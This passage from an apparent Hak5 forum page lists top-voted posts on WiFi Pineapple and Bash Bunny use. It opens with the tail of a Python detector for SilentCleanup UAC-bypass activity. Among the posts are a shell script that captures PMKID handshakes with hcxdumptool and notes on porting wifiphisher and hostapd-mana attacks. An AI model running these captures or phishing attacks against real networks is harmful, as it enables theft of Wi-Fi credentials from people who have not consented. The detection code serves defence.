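                    if f["id"] == 1 and _ts(f) <= deadline
                    and SILENTCLEANUP.search(f.get("CommandLine", ""))]
        value = e.get("Details", "")
        alerts.append({
            "time": e["time"],
            "image": e.get("Image", ""),
            "value": value,
            "comment_terminator": value.rstrip().endswith(COMMENT_TERMINATORS),
            "silentcleanup_launch": bool(launches),
            "severity": "high" if launches else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["time"], a["image"], repr(a["value"]))
```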
  38. 2 points
    @Forkish Yes you could use kismet, Horst, tcpdump etc. and look for activity. But the OP wanted a walk-around site tool. - I have only used Pisavar on my tetra and nano to find each other. It did what it said it would do. Also, I like the idea of using a pineapple to run a pineapple hunting tool 😄 https://github.com/WiPi-Hunter To name names in the forum, start with the @ then start typing the name and a drop-down list below will start suggesting matches.
  39. 2 points
    So I got a Nano from a friend and had firmware 1.X.X running for a while and everything was working besides the fact the spoofed SSIDs didn't provide wifi. After poking around I realized my firmware was very out of date so I did the update to 2.4.2. Now it seems like everything is just broken. CPU is pegged at 100% almost all the time, even when nothing is running. PineAP hasn't captured a single SSID even though 20 minutes ago while running the other firmware I had about 25. Just to make sure I wasn't just being impatient I let it run for 12 hours. Still nothing. So far for troubleshooting I've tried factory resetting the device (2x), ran my laptop with just wifi as well as with ethernet, ran the wp6.sh script and confirmed all the interfaces were correct. At this point I'm starting to wonder if maybe I'm just doing something wrong? Has anyone had these kinds of issues? If so, how did you fix it? Side note, I'm using Ubuntu, not sure if that matters.
  40. 2 points
    I can personally confirm that the tactical antennas are supposed to do that by design. They do tend to "stay up" on their own if you balance them but they're not *supposed* to lean in a specific direction.
  41. 2 points
    I'd be remiss if I failed to start this topic with the following: Great Job Hak5 dev team! I saw the mention of a road map so it's likely you've thought of these already but just in case here is my feature wish list:
    Definable device phone home URI for use with HTTPd proxy-pass
    More granular control over server config
    HTTPS port other than 443
    Select existing TLS certs in lieu of creating new Let's Encrypt certs
    Option for client cert authentication to the dashboard
    Option to output config files for HTTPd of choice (Apache, Nginx, Lighttpd, etc.)
    CloudC2 as a Tor hidden service
    Device OpenVPN call home to C2
    If there are already ways to do all or some of the above please let me know. Again fantastic work thus far!
  42. 2 points
    I have also updated my simple button script so that it stores captured data to /pineapple/modules/PMKID/capture, you can then use g0blin's module to view the data.
    #!/bin/bash
    #PixL
    file="/tmp/handshake"
    # three random digits used as the name of this capture
    capture="$(tr -dc '0123456789' < /dev/urandom | head -c3)"
    if [ -f "$file" ]
    then
        # flag file exists: second press stops the capture, converts and stores the files
        killall hcxdumptool
        led YELLOW off
        rm -rf /tmp/handshake
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng /pineapple/modules/PMKID/capture/$capture
        mv test.16800 /pineapple/modules/PMKID/capture/$capture.16800
        mv test.conlog /pineapple/modules/PMKID/capture/$capture.conlog
        mv test.log /pineapple/modules/PMKID/capture/$capture.log
    else
        # no flag file: first press marks a capture as running and starts hcxdumptool in the background
        touch /tmp/handshake
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
    fi
  43. 2 points
    You need to lay off whatever it is you're taking...
  44. 2 points
    Yeah, we are definitely not helping with that.
  45. 2 points
    After sharing an internet connection with the bash bunny, and then ssh-ing in, the following seemed to work for me when updating the bunny:
    apt-get update
    apt-mark hold procps
    apt-get upgrade
    When apt-get then listed out what it was going to upgrade, it showed procps as not being upgraded.
  46. 2 points
    No worries! I worked on this all day and fixed a few other things here and there. I now have the nat-simple, nat-full and eaponly attacks implemented. Just so that you know, I forked both your hostapd-mana and ManaToolkit repos to keep track of my modifications. All changes are only local on my laptop for the moment but I will keep you updated once it is online. Maybe you will be interested in having a look at the multiple attack scripts. Again, thanks a lot for the heavy lifting work!
  47. 2 points
    Seeing as the pineapple is for wifi and not gsm/cdma, then I'm going to go with: not possible.
  48. 2 points
    It runs!!!! Sweet job. I haven't tried to use it yet, I just ran "wifiphisher --help". Will try and make some time to take a closer look. Clone the repo to the pineapple, install all the ipk files using "opkg update && opkg install *.ipk" (internet required on pineapple). Once finished, clone the original wifiphisher (until zylla has something tweaked for pineapples) to the wifiphisher directory, for example. Browse to said folder and run "python setup.py install". Once finished you should be able to type "wifiphisher --help" to see options. Not sure it's 100% working yet but at least it runs!!!! Thanks @Zylla, fun times.
  49. 2 points
    Well.... As of this moment I've compiled every single dependency (I think I've gotten 'em all...). They can be found at https://www.github.com/adde88/openwrt-useful-tools/ Inside the repo there's a folder named wifiphisher-openwrt which contains the IPKs for the dependencies, as well as the wifiphisher directory (it contains the same files as the main wifiphisher repo). For people experienced with python and developing I recommend you test it, and try to work out the errors as they show up. Wifiphisher relies a lot on NetworkManager, which doesn't exist on the Pineapples. So some code needs to be re-written, for example allowing it to use iwconfig to handle the interfaces, etc. But yeh. Dependencies are now fixed. I'll update the wifiphisher folder with my own code when/if I get something working.
  50. 2 points
    Introduction: This process requires an Android phone capable of running the EasyTether app which can be downloaded here: http://www.mobile-stream.com/a/easytether-device.apk and also possibly an SD card. The Lite version of the app prevents https & udp connection, so to use those you have to pay mobile stream $10 once, which I still think is better than paying your carrier that every month. I do not endorse tethering data without your carrier's permission, proceed at your own risk. I am currently working on a module that will automate this process, if you can't figure out this tutorial you can wait for that or contact me.
    Setup on Android: Download and install the EasyTether app and follow the in-app instructions for setting up USB Tethering.
    Setup on the Pineapple: You will need to install EasyTether for OpenWrt located here: http://www.mobile-stream.com/easytether/drivers.html I used the OpenWrt 15.05 --openssl which I show being downloaded below.
    NOTE: You may need an SD card for this as it is a larger file. The below commands assume you have an SD card set up correctly. If you do not wish to install to your SD card, ignore the --dest sd options below and know that it may not work.
    root@Pineapple:/sd# wget http://www.mobile-stream.com/beta/openwrt/easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip
    Once you have downloaded the package, install unzip so you can open the previously downloaded compressed package. (BTW if anybody knows what the two errors at the bottom are, let me know; to my knowledge they do not affect the packages being installed. My assumption is that opkg is searching in /usr when it should be looking in /sd/usr.)
    root@Pineapple:/sd# opkg install unzip --dest sd
    Installing unzip (6.0-3) to sd...
    Downloading https://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/packages/unzip_6.0-3_ar71xx.ipk.
    Configuring unzip.
    grep: /usr/lib/opkg/info/unzip.control: No such file or directory
    cat: can't open '/usr/lib/opkg/info/unzip.list': No such file or directory
    Then unzip the EasyTether application.
    root@Pineapple:/sd# unzip easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip
    Then cd to the correct application distribution.
    root@Pineapple:/sd# cd 15.05-rc3/ar71xx/generic/
    Then install the application!
    root@Pineapple:/sd/15.05-rc3/ar71xx/generic# opkg install easytether-usb-openssl_0.8.5-1_ar71xx.ipk --dest sd
    After that you can run the application (you do not need to be in any specific directory anymore):
    root@Pineapple:/sd/15.05-rc3/ar71xx/generic# easytether-usb
    Now control-C, because the Pineapple doesn't have Internet just yet; you need to configure it to allow Internet sharing from Android by running the below command (all the lines at once).
    cat << EOF >> /etc/config/network
    config interface 'wan'
        option ifname 'tap-easytether'
        option proto 'dhcp'
    EOF
    You should be all set and see "Connection Established" if you followed the Android instructions correctly and have Internet on your Pineapple! If you need more help ask me or read MobileStream's tutorial. Good luck guys!